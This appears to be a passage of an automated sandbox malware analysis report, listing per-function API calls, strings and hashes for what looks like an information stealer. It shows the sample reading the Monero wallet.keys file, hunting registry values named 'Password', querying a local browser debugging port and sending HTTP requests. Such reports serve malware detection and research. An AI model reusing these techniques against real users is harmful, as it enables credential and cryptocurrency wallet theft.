HttpOpenRequestA.WININET(00000000,02D47210,?,02D465D8,00000000,00000000,00400100,00000000), ref: 00404B65

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00404F1F

Strings

------, xrefs: 00404A0D
", xrefs: 00404C42
------, xrefs: 00404B78
------, xrefs: 00404CB9
", xrefs: 00404D83

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 006971cf91ed3c33a4b1f050e3bd3b8e9a7b263251277a150e194be94de639e5
Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
Opcode Fuzzy Hash: 006971cf91ed3c33a4b1f050e3bd3b8e9a7b263251277a150e194be94de639e5
Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

Function 004062D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
StrCmpCA.SHLWAPI(?,02D471B0), ref: 00406353
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
HttpOpenRequestA.WININET(00000000,GET,?,02D465D8,00000000,00000000,00400100,00000000), ref: 004063D5
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
InternetCloseHandle.WININET(00000000), ref: 0040653F
InternetCloseHandle.WININET(00000000), ref: 00406549
InternetCloseHandle.WININET(00000000), ref: 00406553

Strings

FUA, xrefs: 004062E0, 0040656D, 0040652E, 0040646C, 004062E3
GET, xrefs: 004063CC
ERROR, xrefs: 00406519
ERROR, xrefs: 00406457

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$FUA$GET
API String ID: 3074848878-1334267432
Opcode ID: 5bdd84bb63c3eb29e92c760c510ad1147ce223655e31ae1fae2ff3180c6dae40
Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
Opcode Fuzzy Hash: 5bdd84bb63c3eb29e92c760c510ad1147ce223655e31ae1fae2ff3180c6dae40
Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59

Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

RegOpenKeyExA.KERNEL32(00000000,02D43510,00000000,00020019,00000000,004205BE), ref: 00418534
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
wsprintfA.USER32 ref: 004185E9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
RegCloseKey.ADVAPI32(00000000), ref: 0041861C
RegCloseKey.ADVAPI32(00000000), ref: 00418629

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Strings

%s\%s, xrefs: 004185DD
- , xrefs: 00418733
?, xrefs: 0041850A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 51aaa18d032076d6b2008025f5ed8fa5dd51617a0d9582fce5d2d398ce371ee2
Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
Opcode Fuzzy Hash: 51aaa18d032076d6b2008025f5ed8fa5dd51617a0d9582fce5d2d398ce371ee2
Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9

Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC

Strings

image/jpeg, xrefs: 004192C6
`dAF, xrefs: 004191CF, 00419399, 004191D2, 0041939C
`dAF, xrefs: 00419361, 004193D9, 0041930E, 004192DF, 004192B2, 0041920D, 004191E4, 00419364

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: `dAF$`dAF$image/jpeg
API String ID: 2244384528-2462684518
Opcode ID: 41bf28ced30ba302c6daf9042130ebc0d92023f884189aee248bf7a2f54c11bc
Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
Opcode Fuzzy Hash: 41bf28ced30ba302c6daf9042130ebc0d92023f884189aee248bf7a2f54c11bc
Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65

Function 00415760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02D3E158,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
Sleep.KERNEL32(0000EA60), ref: 00415C6B

Strings

ERROR, xrefs: 004159CD
ERROR, xrefs: 00415B82
ERROR, xrefs: 00415886
ERROR, xrefs: 004158E3
ERROR, xrefs: 00415C4E
ERROR, xrefs: 00415A99

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 3cd2033188d1e104ff9618325504cc72b6f9dc761326f0d00cc02a7d17d2b7c0
Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
Opcode Fuzzy Hash: 3cd2033188d1e104ff9618325504cc72b6f9dc761326f0d00cc02a7d17d2b7c0
Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02D41C70,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401335
.keys, xrefs: 0040136B
\Monero\wallet.keys, xrefs: 0040138D
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 453280bc226a278616caa66055e2693e1d95faff35afdd2eaf7cadd013aba050
Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
Opcode Fuzzy Hash: 453280bc226a278616caa66055e2693e1d95faff35afdd2eaf7cadd013aba050
Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E

Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
InternetCloseHandle.WININET(00000000), ref: 00409AC7

Strings

"webSocketDebuggerUrl":, xrefs: 00409B4B
http://localhost:9229/json, xrefs: 00409A9F
"ws://, xrefs: 00409B84

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68

Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407330: memset.MSVCRT ref: 00407374
Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

lstrcatA.KERNEL32(29637020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
lstrcatA.KERNEL32(29637020,00000000,00000000), ref: 004076A8
lstrcatA.KERNEL32(29637020, : ), ref: 004076BA
lstrcatA.KERNEL32(29637020,00000000,00000000,00000000), ref: 004076EF
lstrcatA.KERNEL32(29637020,00421934), ref: 00407700
lstrcatA.KERNEL32(29637020,00000000,00000000,00000000), ref: 00407733
lstrcatA.KERNEL32(29637020,00421938), ref: 0040774D
task.LIBCPMTD ref: 0040775B

Strings

: , xrefs: 004076AE

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 593fb56242f19c921871786d2b20768cde19ca2a78626e6b551bb8aff056bc54
Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
Opcode Fuzzy Hash: 593fb56242f19c921871786d2b20768cde19ca2a78626e6b551bb8aff056bc54
Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96

Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407374
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 004075B5

Strings

Password, xrefs: 00407461

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95

